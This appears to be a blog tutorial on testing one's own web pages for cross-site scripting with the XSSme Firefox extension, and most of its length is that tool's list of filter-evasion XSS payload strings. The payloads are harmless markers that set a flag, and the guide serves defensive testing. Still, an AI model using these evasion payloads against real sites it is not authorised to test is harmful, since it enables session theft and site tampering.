RSS Feed twitter airdump.cz Follow RemoteSec on the Facebook
Remote Security Random Tips
News & Ads

XSS pentest plug in – Cross-Site Scripting

xss exploit Cross-Site Scripting is an extensive topic that has been described in the past by several people. Although there is a but. I open a page and start to read a cool text, lots of examples and nice colours all around. But after one hour of reading you are still at the begining. So why after reading AirDump tutorial you should manage XSS in a while? This will be answered in this text called Hacking web applications – XSS. First of all most of the tutorials that can be found on the web are focused on technical and theoretical aspects. Practical hints are missing and if you find some of them in examples they are not very realistic. To be able to test your own web page you don´t need to read tuns of texts about web atacks or XSS. What is the reality and useful tips? Here is a practical instruction that you will be able to follow.

All what you need is 5 minutes of your time, Firefox browser, TOR (optional) and one plug-in. At the same time I still hope that the topic XSS is for this century closed. If you find some writer refer him to this text :) Firefox extension is from Security Compass and is called XSSme. Plugin instalation is the same as it would be at the other extensions (Ad-Block,No Script.. etc.)

Offer of XSSme sidebar is in the menu Tools or in klicking mouse menu. The control panel will open on the left side. The configuration is not neccessary. It only depends on what you want to test on the web page. The test of all strings included in the database can last a bit longer.

Result of testing. For XSS vulnerability was tested 54 strings. The test output is well arranged and will be displaied in a new window. The test of web page AirDump.Net showed that the page is not vulnerable by test sequence XSS.

XSS strings that are for testing after installation directly available

<SCRIPT>document.vulnerable=true;</SCRIPT>
<IMG SRC=”jav ascript:document.vulnerable=true;”>
<IMG SRC=”javascript:document.vulnerable=true;”>
<IMG SRC=” &#14; javascript:document.vulnerable=true;”>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;>
<<SCRIPT>document.vulnerable=true;//<</SCRIPT>
<SCRIPT <B>document.vulnerable=true;</SCRIPT>
<IMG SRC=”javascript:document.vulnerable=true;”
<iframe src=”javascript:document.vulnerable=true;
<SCRIPT>a=/XSS/\ndocument.vulnerable=true;</SCRIPT>
\”;document.vulnerable=true;;//
</TITLE><SCRIPT>document.vulnerable=true;</SCRIPT>
<INPUT TYPE=”IMAGE” SRC=”javascript:document.vulnerable=true;”>
<BODY BACKGROUND=”javascript:document.vulnerable=true;”>
<BODY ONLOAD=document.vulnerable=true;>
<IMG DYNSRC=”javascript:document.vulnerable=true;”>
<IMG LOWSRC=”javascript:document.vulnerable=true;”>
<BGSOUND SRC=”javascript:document.vulnerable=true;”>
<BR SIZE=”&{document.vulnerable=true}”>
<LAYER SRC=”javascript:document.vulnerable=true;”></LAYER>
<LINK REL=”stylesheet” HREF=”javascript:document.vulnerable=true;”>
<STYLE>li {list-style-image: url(“javascript:document.vulnerable=true;”);</STYLE><UL><LI>XSS
<IMG SRC=’vbscript:document.vulnerable=true;’>
1/4script3/4document.vulnerable=true;1/4/script3/4
<META HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript:document.vulnerable=true;”>
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:document.vulnerable=true;”>

<IFRAME SRC=”javascript:document.vulnerable=true;”></IFRAME>
<FRAMESET><FRAME SRC=”javascript:document.vulnerable=true;”></FRAMESET>
<TABLE BACKGROUND=”javascript:document.vulnerable=true;”>
<TABLE><TD BACKGROUND=”javascript:document.vulnerable=true;”>
<DIV STYLE=”background-image: url(javascript:document.vulnerable=true;)”>
<DIV STYLE=”background-image: url(&#1;javascript:document.vulnerable=true;)”>
<DIV STYLE=”width: expression(document.vulnerable=true);”><STYLE>@im\port’\ja\vasc\ript:document
.vulnerable=true’;</STYLE>
<IMG STYLE=”xss:expr/*XSS*/ession(document.vulnerable=true)”>
<XSS STYLE=”xss:expression(document.vulnerable=true)”>
exp/*<A STYLE=’no\xss:noxss(“*//*”);xss:ex/*XSS*//*/*/pression(document.vulnerable=true)’>
<STYLE TYPE=”text/javascript”>document.vulnerable=true;</STYLE>
<STYLE>.XSS{background-image:url(“javascript:document.vulnerable=true”);}</STYLE><A CLASS=XSS></A>
<STYLE type=”text/css”>BODY{background:url(“javascript:document.vulnerable=true”)}</STYLE>
<!–[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]–>
<BASE HREF=”javascript:document.vulnerable=true;//”>
<? echo(‘<SCR)’;echo(‘IPT>document.vulnerable=true</SCRIPT>’); ?>
<a href=”javascript#document.vulnerable=true;”>
<div onmouseover=”document.vulnerable=true;”>
<img src=”javascript:document.vulnerable=true;”>
<img dynsrc=”javascript:document.vulnerable=true;”>
<input type=”image” dynsrc=”javascript:document.vulnerable=true;”>
<bgsound src=”javascript:document.vulnerable=true;”>
&<script>document.vulnerable=true;</script>
&{document.vulnerable=true;};
<img src=&{document.vulnerable=true;};>
<link rel=”stylesheet” href=”javascript:document.vulnerable=true;”>
<iframe src=”vbscript:document.vulnerable=true;”>
<img src=”mocha:document.vulnerable=true;”>
<img src=”livescript:document.vulnerable=true;”>
<a href=”about:<script>document.vulnerable=true;</script>”>
<meta http-equiv=”refresh” content=”0;url=javascript:document.vulnerable=true;”>
<body onload=”document.vulnerable=true;”>
<div style=”background-image: url(javascript:document.vulnerable=true;);”>
<div style=”behaviour: url([link to code]);”>
<div style=”binding: url([link to code]);”>
<div style=”width: expression(document.vulnerable=true;);”>
<style type=”text/javascript”>document.vulnerable=true;</style>
<object classid=”clsid:…” codebase=”javascript:document.vulnerable=true;”>
<style><!–</style><script>document.vulnerable=true;//–></script>
<<script>document.vulnerable=true;</script>
<![CDATA[<!–]]<script>document.vulnerable=true;//–></script>
<!– — –><script>document.vulnerable=true;</script><!– — –>
<img src=”blah”onmouseover=”document.vulnerable=true;”>
<img src=”blah>” onmouseover=”document.vulnerable=true;”>
<xml src=”javascript:document.vulnerable=true;”>
<xml id=”X”><a><b><script>document.vulnerable=true;</script>;</b></a></xml>
<div datafld=”b” dataformatas=”html” datasrc=”#X”></div>
[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>
<META HTTP-EQUIV=”Set-Cookie” Content=”USERID=<SCRIPT>document.vulnerable=true</SCRIPT>”>

<HEAD><META HTTP-EQUIV=”CONTENT-TYPE” CONTENT=”text/html; charset=UTF-7″> </HEAD>+ADw-SCRIPT+AD4
-document.vulnerable=true;+ADw-/SCRIPT+AD4-

<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document
.vulnerable=true></OBJECT>

<XML ID=I><X><C><![CDATA[<IMG SRC=”javas]]<![CDATA[cript:document.vulnerable=true;”>]]</C><X></xml>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID=”xss”><I><B><IMG SRC=”javas<!—->cript:document.vulnerable=true”></B></I><XML><SPAN DATASRC=
“#xss”DATAFLD=”B” DATAFORMATAS=”HTML”></SPAN>

<HTML><BODY><?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”><?import namespace=”t”
implementation=”#default#time2″> <t:set attributeName=
“innerHTML” to=”XSS<SCRIPT DEFER>document.vulnerable=true </SCRIPT>”></BODY></HTML>

Other strings can be easily added to the list. Manualy or by XML import in the interface menu. The extension can be dowloaded at airdum subdomain download in the folder XSS.

Similar Posts: